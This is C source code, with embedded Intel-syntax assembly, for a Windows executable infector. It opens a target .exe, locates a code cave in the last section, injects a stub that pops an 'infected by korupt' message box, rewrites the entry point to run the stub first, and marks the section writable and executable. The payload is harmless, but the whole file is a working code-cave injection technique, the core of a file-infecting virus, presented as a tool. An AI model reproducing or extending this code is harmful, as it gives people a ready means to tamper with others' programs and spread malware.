1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
|
#include <windows.h>
#include <stdio.h>
// fucking gcc wont let us use __declspec(naked)
// so we have to fudge around this with assembler hacks
void realStubStart();
void realStubEnd();
void StubStart()
{
__asm__(
".intel_syntax noprefix\n" // att syntax sucks
".globl _realStubStart\n"
"_realStubStart:\n\t" // _realStubStart is global --^
"pusha\n\t" // preserve our thread context
"call GetBasePointer\n"
"GetBasePointer:\n\t"
"pop ebp\n\t"
"sub ebp, offset GetBasePointer\n\t" // delta offset trick. Think relative...
"push 0\n\t"
"lea eax, [ebp+szTitle]\n\t"
"push eax\n\t"
"lea eax, [ebp+szText]\n\t"
"push eax\n\t"
"push 0\n\t"
"mov eax, 0xCCCCCCCC\n\t"
"call eax\n\t"
"popa\n\t" // restore our thread context
"push 0xCCCCCCCC\n\t" // push address of orignal entrypoint(place holder)
"ret\n" // retn used as jmp
// i dont know about you but i like GCC;'s method of strings
// over MSVC :P
"szTitle: .string \"o hi\"\n"
"szText: .string \"infected by korupt\"\n"
".globl _realStubEnd\n"
"_realStubEnd:\n\t"
".att_syntax\n" // fix so the rest of gcc doesnt burp
);
}
// By Napalm
DWORD FileToVA(DWORD dwFileAddr, PIMAGE_NT_HEADERS pNtHeaders)
{
WORD wSections;
PIMAGE_SECTION_HEADER lpSecHdr = (PIMAGE_SECTION_HEADER)((DWORD)pNtHeaders + sizeof(IMAGE_NT_HEADERS));
for (wSections = 0; wSections < pNtHeaders->FileHeader.NumberOfSections; wSections++)
{
if (dwFileAddr >= lpSecHdr->PointerToRawData)
{
if (dwFileAddr < (lpSecHdr->PointerToRawData + lpSecHdr->SizeOfRawData))
{
dwFileAddr -= lpSecHdr->PointerToRawData;
dwFileAddr += (pNtHeaders->OptionalHeader.ImageBase + lpSecHdr->VirtualAddress);
return dwFileAddr;
}
}
lpSecHdr++;
}
return 0;
}
int main(int argc, char* argv[])
{
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS pNtHeaders;
PIMAGE_SECTION_HEADER pSection, pSectionHeader;
HANDLE hFile, hFileMap;
HMODULE hUser32;
LPBYTE hMap;
int i = 0, charcounter = 0;
DWORD oepRva = 0, oep = 0, fsize = 0, writeOffset = 0, oepOffset = 0, callOffset = 0;
unsigned char *stub;
// work out stub size
DWORD start = (DWORD)realStubStart;
DWORD end = (DWORD)realStubEnd;
DWORD stubLength = (end - start);
if (argc != 2)
{
printf("Usage: %s [file]\n", argv[0]);
return 0;
}
// map file
hFile = CreateFile(argv[1], GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("[-] Cannot open %s\n", argv[1]);
return 0;
}
fsize = GetFileSize(hFile, 0);
if (!fsize)
{
printf("[-] Could not get files size\n");
CloseHandle(hFile);
return 0;
}
hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL);
if (!hFileMap)
{
printf("[-] CreateFileMapping failed\n");
CloseHandle(hFile);
return 0;
}
hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);
if (!hMap)
{
printf("[-] MapViewOfFile failed\n");
CloseHandle(hFileMap);
CloseHandle(hFile);
return 0;
}
// check signatures
pDosHeader = (PIMAGE_DOS_HEADER)hMap;
if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
{
printf("[-] DOS signature not found\n");
goto cleanup;
}
pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);
if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE)
{
printf("[-] NT signature not found\n");
goto cleanup;
}
// korupt you need to tdo this more often fuck argh
if (pNtHeaders->FileHeader.Machine != IMAGE_FILE_MACHINE_I386)
{
printf("[-] Not an i386 executable\n");
goto cleanup;
}
// get last section's header...
pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
pSection = pSectionHeader;
pSection += (pNtHeaders->FileHeader.NumberOfSections - 1);
// save entrypoint
oep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint;
oep += (pSectionHeader->PointerToRawData) - (pSectionHeader->VirtualAddress);
// locate free space
i = pSection->PointerToRawData;
for (; i != fsize; i++)
{
if ((BYTE)hMap[i] == 0x00)
{
if (charcounter++ == stubLength + 24)
{
printf("[+] Code cave located @ 0x%08X\n", i);
writeOffset = i;
}
}
else charcounter = 0;
}
if (charcounter == 0 || writeOffset == 0)
{
printf("[-] Could not locate a big enough code cave\n");
goto cleanup;
}
writeOffset -= stubLength;
stub = (unsigned char *)malloc(stubLength + 1);
if (!stub)
{
printf("[-] Error allocating sufficent memory for code\n");
goto cleanup;
}
// copy stub into a buffer
memcpy(stub, realStubStart, stubLength);
// locate offsets of place holders in code
for (i = 0, charcounter = 0; i != stubLength; i++)
{
if (stub[i] == 0xCC)
{
charcounter++;
if (charcounter == 4 && callOffset == 0)
callOffset = i - 3;
else if (charcounter == 4 && oepOffset == 0)
oepOffset = i - 3;
}
else charcounter = 0;
}
// check they're valid
if (oepOffset == 0 || callOffset == 0)
{
free(stub);
goto cleanup;
}
hUser32 = LoadLibrary("User32.dll");
if (!hUser32)
{
free(stub);
printf("[-] Could not load User32.dll");
goto cleanup;
}
// fill in place holders
*(u_long *)(stub + oepOffset) = (oepRva + pNtHeaders->OptionalHeader.ImageBase);
*(u_long *)(stub + callOffset) = ((DWORD)GetProcAddress(hUser32, "MessageBoxA"));
FreeLibrary(hUser32);
// write stub
memcpy((PBYTE)hMap + writeOffset, stub, stubLength);
// set entrypoint
pNtHeaders->OptionalHeader.AddressOfEntryPoint =
FileToVA(writeOffset, pNtHeaders) - pNtHeaders->OptionalHeader.ImageBase;
// set section size
pSection->Misc.VirtualSize += stubLength;
pSection->Characteristics |= IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;
// cleanup
printf("[+] Stub written!!\n[*] Cleaning up\n");
free(stub);
cleanup:
FlushViewOfFile(hMap, 0);
UnmapViewOfFile(hMap);
SetFilePointer(hFile, fsize, NULL, FILE_BEGIN);
SetEndOfFile(hFile);
CloseHandle(hFileMap);
CloseHandle(hFile);
return 0;
}
|